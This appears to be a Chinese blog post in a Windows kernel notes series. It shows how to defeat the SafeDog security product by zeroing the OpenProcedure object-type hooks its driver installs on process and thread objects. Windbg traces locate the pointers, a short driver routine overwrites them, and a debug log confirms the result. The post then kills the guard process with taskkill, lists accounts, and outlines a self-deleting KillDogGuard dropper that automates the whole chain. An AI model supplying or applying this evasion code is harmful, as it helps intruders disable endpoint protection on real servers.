windows内核笔记 3:实战SafeDogFileGuard.sys (object hook)
前言
文本探讨如果在r0 层恢复某狗的驱动,从而去掉其各种限制.当然r3 层也是有很多猥琐方法,本文暂先不表.
首先用 PCHunter 查看驱动SafeDogFileGuard.sys1
2
3
4
5
6[PC Hunter Standard][ObjectType Hook]: 15
函数名 当前函数地址 Hook 原地址 Object类型 地址 当前函数地址所在模块
.......
OpenProcedure 0xB145E79A object hook - PsThreadType 0x8055A35C C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
OpenProcedure 0xB145E5CE object hook - PsProcessType 0x8055A358 C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
......
windbg 调试
某狗hook 了OpenProcedure
先来用windbg调试之1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87kd> dd PsProcessType //获取 PsProcessType 地址
8055a358 89e34e38 89e34c68 e10017e8 00000002
8055a368 00000003 00000000 00000000 00000000
8055a378 00000000 00000000 e18ee2ff e1754857
8055a388 e16bba07 00000000 00000000 00000000
8055a398 00000000 00000000 e19022c7 e209cc27
8055a3a8 00000000 00000000 00000000 00000000
8055a3b8 00000000 00000000 00000002 00000000
8055a3c8 00000000 00000000 00000000 00000000
kd> dt 89e34e38 _object_type //查看 _object_type 结构体 找到 _OBJECT_TYPE_INITIALIZER 结构偏移
ntdll!_OBJECT_TYPE
+0x000 Mutex : _ERESOURCE
+0x038 TypeList : _LIST_ENTRY [ 0x89e34e70 - 0x89e34e70 ]
+0x040 Name : _UNICODE_STRING "Process"
+0x048 DefaultObject : (null)
+0x04c Index : 5
+0x050 TotalNumberOfObjects : 0x1a
+0x054 TotalNumberOfHandles : 0x63
+0x058 HighWaterNumberOfObjects : 0x1c
+0x05c HighWaterNumberOfHandles : 0x71
+0x060 TypeInfo : _OBJECT_TYPE_INITIALIZER
+0x0ac Key : 0x636f7250
+0x0b0 ObjectLocks : [4] _ERESOURCE
kd> dt 89e34e38+0x060 _OBJECT_TYPE_INITIALIZER
ntdll!_OBJECT_TYPE_INITIALIZER
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0xb0
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f0fff
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0 ''
+0x020 PoolType : 0 ( NonPagedPool )
+0x024 DefaultPagedPoolCharge : 0x1000
+0x028 DefaultNonPagedPoolCharge : 0x290
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : 0xb137a5ce long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c77e2 void nt!PspProcessDelete+0
+0x03c ParseProcedure : (null)
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
+0x044 QueryNameProcedure : (null)
+0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a5ce //汇编0xb137a5ce
SafeDogFileGuard+0x85ce:
b137a5ce 8bff mov edi,edi
b137a5d0 55 push ebp
b137a5d1 8bec mov ebp,esp
b137a5d3 8b450c mov eax,dword ptr [ebp+0Ch]
b137a5d6 83ec0c sub esp,0Ch
b137a5d9 56 push esi
b137a5da 33f6 xor esi,esi
b137a5dc 57 push edi
kd> dt _OBJECT_TYPE_INITIALIZER poi(PsThreadType)+0x60 //根据上面结果一步到位
ntdll!_OBJECT_TYPE_INITIALIZER
+0x000 Length : 0x4c
+0x002 UseDefaultObject : 0 ''
+0x003 CaseInsensitive : 0 ''
+0x004 InvalidAttributes : 0xb0
+0x008 GenericMapping : _GENERIC_MAPPING
+0x018 ValidAccessMask : 0x1f03ff
+0x01c SecurityRequired : 0x1 ''
+0x01d MaintainHandleCount : 0 ''
+0x01e MaintainTypeList : 0 ''
+0x020 PoolType : 0 ( NonPagedPool )
+0x024 DefaultPagedPoolCharge : 0
+0x028 DefaultNonPagedPoolCharge : 0x288
+0x02c DumpProcedure : (null)
+0x030 OpenProcedure : 0xb137a79a long +0
+0x034 CloseProcedure : (null)
+0x038 DeleteProcedure : 0x805c796a void nt!PspThreadDelete+0
+0x03c ParseProcedure : (null)
+0x040 SecurityProcedure : 0x805edcf6 long nt!SeDefaultObjectMethod+0
+0x044 QueryNameProcedure : (null)
+0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a79a
SafeDogFileGuard+0x879a:
b137a79a 8bff mov edi,edi
b137a79c 55 push ebp
b137a79d 8bec mov ebp,esp
b137a79f 83ec30 sub esp,30h
b137a7a2 53 push ebx
b137a7a3 56 push esi
b137a7a4 57 push edi
b137a7a5 ff7510 push dword ptr [ebp+10h]
代码恢复 object hook
根据2 调试结果
驱动入口中写入1
2
3
4
5
6ULONG uProcssAddr=(ULONG)(*PsProcessType)+0x60+0x30; //获取 OpenProcdure [PsProcessType] 指针
KdPrint(("[+] OpenProcdure [PsProcessType] 0x%08x\n",uProcssAddr));
*(PULONG)uProcssAddr = 0x00000000; // OpenProcdure [PsProcessType] 指针清零
ULONG uThreadAddr=(ULONG)(*PsThreadType)+0x60+0x30;
KdPrint(("[+] OpenProcdure [PsThreadType] 0x%08x\n",uThreadAddr));
*(PULONG)uThreadAddr = 0x00000000; // OpenProcdure [PsThreadType] 指针清零
windbg 调试日志1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33[+] -------------------- DriverEntry -----------------
Break instruction exception - code 80000003 (first chance)
HelloDrive!DriverEntry+0xaf:
bac7922f cc int 3
kd> p
HelloDrive!DriverEntry+0xb0:
bac79230 8b0d18a0c7ba mov ecx,dword ptr [HelloDrive!PsProcessType (bac7a018)]
kd> p
HelloDrive!DriverEntry+0xc1:
bac79241 8b45fc mov eax,dword ptr [ebp-4]
kd> p
[+] OpenProcdure [PsProcessType] 0x89e34ec8
HelloDrive!DriverEntry+0xd2:
bac79252 8b4dfc mov ecx,dword ptr [ebp-4]
kd> p
HelloDrive!DriverEntry+0xdb:
bac7925b 8b1514a0c7ba mov edx,dword ptr [HelloDrive!PsThreadType (bac7a014)]
kd> p
HelloDrive!DriverEntry+0xeb:
bac7926b 8b4df8 mov ecx,dword ptr [ebp-8]
kd> p
[+] OpenProcdure [PsThreadType] 0x89e34cf8
HelloDrive!DriverEntry+0xfc:
bac7927c 8b55f8 mov edx,dword ptr [ebp-8]
kd> p
HelloDrive!DriverEntry+0x105:
bac79285 33c0 xor eax,eax
kd> dd poi(PsProcessType)+0x60+0x30 l1
89e34ec8 00000000
kd> dd poi(PsThreadType)+0x60+0x30 l1
89e34cf8 00000000
kd> g
[+] -------------------- Driver Unload -----------------
指针已经的值为 00000000 说明hook 已经废了
现在就可以干一系列的猥琐事了
比如1
2
3
4
5
6
7
8
9
10C:\Documents and Settings\Administrator>taskkill /im SafeDogGuardCenter.exe /f
成功: 已终止进程 "SafeDogGuardCenter.exe",其 PID 为 1156。
C:\Documents and Settings\Administrator>net user
\\FUCKAV-A5A6BAA4 的用户帐
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0 test
命令成功完成。
KillDogGuard 编写
为了方便 写成单个文件 其执行过程为1
运行 KillDogGuard.exe -> 释放 KillDogGuard.sys -> 加载驱动 启动-> unhook OpenProcdure ->结束守护进程 ->卸载驱动 删除文件
vc 6.0 代码
1 |
|
高清无码图
代码下载
参考资料
object hook :http://bbs.pediy.com/showthread.php?t=128161